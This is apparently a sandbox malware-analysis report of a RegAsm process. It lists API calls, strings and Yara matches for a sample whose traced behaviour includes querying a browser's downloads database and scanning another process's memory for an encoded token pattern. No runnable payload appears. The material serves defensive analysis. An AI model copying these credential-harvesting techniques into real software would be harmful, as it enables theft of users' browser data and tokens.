                                                                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                                                                                                                                                                                    • String ID: tl
                                                                                                                                                                                                                                                    • API String ID: 3421697164-2603243157
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F770,-00000001,?,6C74E330,?,6C6FBDF7), ref: 6C73A7AF
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C6FBDF7), ref: 6C73A7C2
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000018,?,6C6FBDF7), ref: 6C73A7E4
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F770), ref: 6C73A80A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                                                                                                                                                                                    • String ID: accelerator.dll
                                                                                                                                                                                                                                                    • API String ID: 2442272132-2426294810
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ole32,?,6C6DEE51,?), ref: 6C6DF0B2
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C6DF0C2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • ole32, xrefs: 6C6DF0AD
                                                                                                                                                                                                                                                    • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C6DF0DC
                                                                                                                                                                                                                                                    • Could not find CoTaskMemFree, xrefs: 6C6DF0E3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                    • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                                                                                                                                                                                    • API String ID: 2574300362-1578401391
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6E7235), ref: 6C7100D8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C7100F7
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C6E7235), ref: 6C71010E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • wintrust.dll, xrefs: 6C7100D3
                                                                                                                                                                                                                                                    • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C7100F1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-2559046807
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6E7204), ref: 6C710088
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C7100A7
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C6E7204), ref: 6C7100BE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-3385133079
                                                                                                                                                                                                                                                    • Opcode ID: cc5959e0de1f46e702ba10e69f79994012be160dc0fde581d24b358b3501e536
                                                                                                                                                                                                                                                    • Instruction ID: 276092c2341bcafd0ca03190a9570c37049dd8c1f049ffc8f3565267331bc4d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc5959e0de1f46e702ba10e69f79994012be160dc0fde581d24b358b3501e536
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE012783053449FEF00AF268A087113AFCA70B345FD8443AAA10C2A00DFB5E1609B11
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6E7308), ref: 6C710178
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C710197
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C6E7308), ref: 6C7101AE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-3354427110
                                                                                                                                                                                                                                                    • Opcode ID: 266885681b15bc091265f37a6db355aae39461492233fd3661d18742cfee62a0
                                                                                                                                                                                                                                                    • Instruction ID: 1e585950a8545bdca605e498679222fdc8b0a278a31235124a171cd032fd758c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 266885681b15bc091265f37a6db355aae39461492233fd3661d18742cfee62a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0E04F70785344DBEF005F26CA08B163BFCB707695F980436EA8185B40DF74A460DB10
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6E7297), ref: 6C710128
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C710147
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C6E7297), ref: 6C71015E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-1536241729
                                                                                                                                                                                                                                                    • Opcode ID: b1e2ca54ecfd1614bf3b8bd3e0daa068ce635376f8740ad4f02dbee5872a4ade
                                                                                                                                                                                                                                                    • Instruction ID: 88f0d076eeb21491affd4e1ed81f64c2e36d593e7ab9b2b46831b4ed4eab0d8e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1e2ca54ecfd1614bf3b8bd3e0daa068ce635376f8740ad4f02dbee5872a4ade
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEE01A703093849BEF006F2AD9087163AFCA707364F984439AA05D2B00DF74E4209B10
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C73C0E9), ref: 6C73C418
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C73C437
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C73C0E9), ref: 6C73C44C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-2623246514
                                                                                                                                                                                                                                                    • Opcode ID: 45406765ae41c941945e2b10ab391ac427cc081455dc385d470222b41b05fbb4
                                                                                                                                                                                                                                                    • Instruction ID: 46c9d77caf4e3f63a5c0053baee9ac1c0ab8cf29f205f1f27af0665c0add189c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45406765ae41c941945e2b10ab391ac427cc081455dc385d470222b41b05fbb4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00E092B0702315ABDF006F729A08B257EFCA70A605F889236AA0992701EFB2E4548A50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C73748B,?), ref: 6C7375B8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C7375D7
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C73748B,?), ref: 6C7375EC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-3641475894
                                                                                                                                                                                                                                                    • Opcode ID: b0556dba16a0f48c49da825267b7a147274dd615e7ab9994a530a37df0ec37f4
                                                                                                                                                                                                                                                    • Instruction ID: 64450b41619ed19f04cc533e54e50352cda04ba38968954381f3f581c340f9c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0556dba16a0f48c49da825267b7a147274dd615e7ab9994a530a37df0ec37f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37E0B671701309EFEF006FB2DA487167AFCEB06258FE45835A905D1681EFB0A551CF10
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C737592), ref: 6C737608
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C737627
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C737592), ref: 6C73763C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-1050664331
                                                                                                                                                                                                                                                    • Opcode ID: f0d812fa372582e4efd19b699182027083166610a6b44146905b8658ace96a16
                                                                                                                                                                                                                                                    • Instruction ID: d554fda660fb3f4e0243b43528547a584dcef4fca52e6fb159fa77aecdf81326
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0d812fa372582e4efd19b699182027083166610a6b44146905b8658ace96a16
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88E092B0700355AFDF006FB69E087117EBCE71A259FD45939E909D2641EFB1A4148B14
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C73C1DE,?,00000000,?,00000000,?,6C6E779F), ref: 6C73C1F8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C73C217
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C73C1DE,?,00000000,?,00000000,?,6C6E779F), ref: 6C73C22C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: WinVerifyTrust$wintrust.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-2991032369
                                                                                                                                                                                                                                                    • Opcode ID: 846ff81daa3147d8c43808514930a7d9af32193ebd46702e0c551ca283f58e95
                                                                                                                                                                                                                                                    • Instruction ID: 133ea777335734ead3fd36186cabc40215066fb696ce4beffee03e2c23163277
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 846ff81daa3147d8c43808514930a7d9af32193ebd46702e0c551ca283f58e95
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DE0B6743013559BDF407F62CA087127EFCBB07205FD4463AAA05D2702EFB1A4108B54
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408508
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040851C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                    • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                                                                    • API String ID: 2500673778-2241552939
                                                                                                                                                                                                                                                    • Opcode ID: 36ed976eb8b7b7364f5a3267f9e8dc698624d3e311bd475227079a4cb8571c5a
                                                                                                                                                                                                                                                    • Instruction ID: 262726998fc7bfb6f1ca874174d74250554945675107b90bc2b65f9b5e3821e0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36ed976eb8b7b7364f5a3267f9e8dc698624d3e311bd475227079a4cb8571c5a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FC15D71805248EACB14EBE4C955ADEBBB96F18304F54417EE406736D2DB382B0CCB79
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F0A5
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040F0D2
                                                                                                                                                                                                                                                      • Part of subcall function 0040EEC0: strlen.MSVCRT ref: 0040EECD
                                                                                                                                                                                                                                                      • Part of subcall function 0040EEC0: strlen.MSVCRT ref: 0040EEE7
                                                                                                                                                                                                                                                      • Part of subcall function 0040EEC0: strlen.MSVCRT ref: 0040EFA2
                                                                                                                                                                                                                                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,00000000,00000000,00000000,?,0040FAA1,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF,00000FFF), ref: 0040F11E
                                                                                                                                                                                                                                                    • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040F204
                                                                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 0040F213
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strlen$QueryVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3099930812-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?,?,6C73BE49), ref: 6C73BEC4
                                                                                                                                                                                                                                                    • RtlCaptureStackBackTrace.NTDLL ref: 6C73BEDE
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C73BE49), ref: 6C73BF38
                                                                                                                                                                                                                                                    • RtlReAllocateHeap.NTDLL ref: 6C73BF83
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(6C73BE49,00000000), ref: 6C73BFA6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2764315370-0
